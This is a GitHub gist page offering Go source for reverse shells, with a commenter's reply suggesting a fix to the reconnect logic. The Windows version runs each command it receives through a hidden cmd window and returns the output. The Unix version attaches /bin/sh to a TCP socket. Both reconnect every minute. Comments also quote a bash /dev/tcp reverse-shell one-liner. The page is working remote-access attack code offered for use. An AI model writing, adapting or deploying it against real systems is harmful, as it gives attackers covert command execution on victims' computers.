-
-
Save yougg/b47f4910767a74fcfe1077d21568070e to your computer and use it in GitHub Desktop.
Golang reverse shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// +build windows | |
// Reverse Windows CMD | |
// Test with nc -lvvp 6666 | |
package main | |
import ( | |
"bufio" | |
"net" | |
"os/exec" | |
"syscall" | |
"time" | |
) | |
func main() { | |
reverse("127.0.0.1:6666") | |
} | |
func reverse(host string) { | |
c, err := net.Dial("tcp", host) | |
if nil != err { | |
if nil != c { | |
c.Close() | |
} | |
time.Sleep(time.Minute) | |
reverse(host) | |
} | |
r := bufio.NewReader(c) | |
for { | |
order, err := r.ReadString('\n') | |
if nil != err { | |
c.Close() | |
reverse(host) | |
return | |
} | |
cmd := exec.Command("cmd", "/C", order) | |
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} | |
out, _ := cmd.CombinedOutput() | |
c.Write(out) | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//go:generate sh -c "CGO_ENABLED=0 go build -installsuffix netgo -tags netgo -ldflags \"-s -w -extldflags '-static'\" -o $DOLLAR(basename ${GOFILE} .go)`go env GOEXE` ${GOFILE}" | |
// +build !windows | |
// Reverse Shell in Go | |
// http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
// Test with nc -lvvp 6666 | |
package main | |
import ( | |
"net" | |
"os/exec" | |
"time" | |
) | |
func main() { | |
reverse("127.0.0.1:6666") | |
} | |
// bash -i >& /dev/tcp/localhost/6666 0>&1 | |
func reverse(host string) { | |
c, err := net.Dial("tcp", host) | |
if nil != err { | |
if nil != c { | |
c.Close() | |
} | |
time.Sleep(time.Minute) | |
reverse(host) | |
} | |
cmd := exec.Command("/bin/sh") | |
cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c | |
cmd.Run() | |
c.Close() | |
reverse(host) | |
} |
Author
yougg
commented
Aug 21, 2020
- reverse shell over http/socks proxy
Line 34 in reversesh.go uses infinite recursion reverse(host)
. This will eventually put enough function calls on the stack to crash the program because it has to many pointers. (the program keeps pointers where to go back once the function is done, which never happens and floods the stacktrace someday)
better remove that line and just wrap everything inside the reverse-function in a regular infinite for-loop like this:
func reverse(host string) {
for {
c, err := net.Dial("tcp", host)
if nil != err {
if nil != c {
c.Close()
}
time.Sleep(time.Minute)
reverse(host)
}
cmd := exec.Command("/bin/sh")
cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c
cmd.Run()
c.Close()
}
}
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment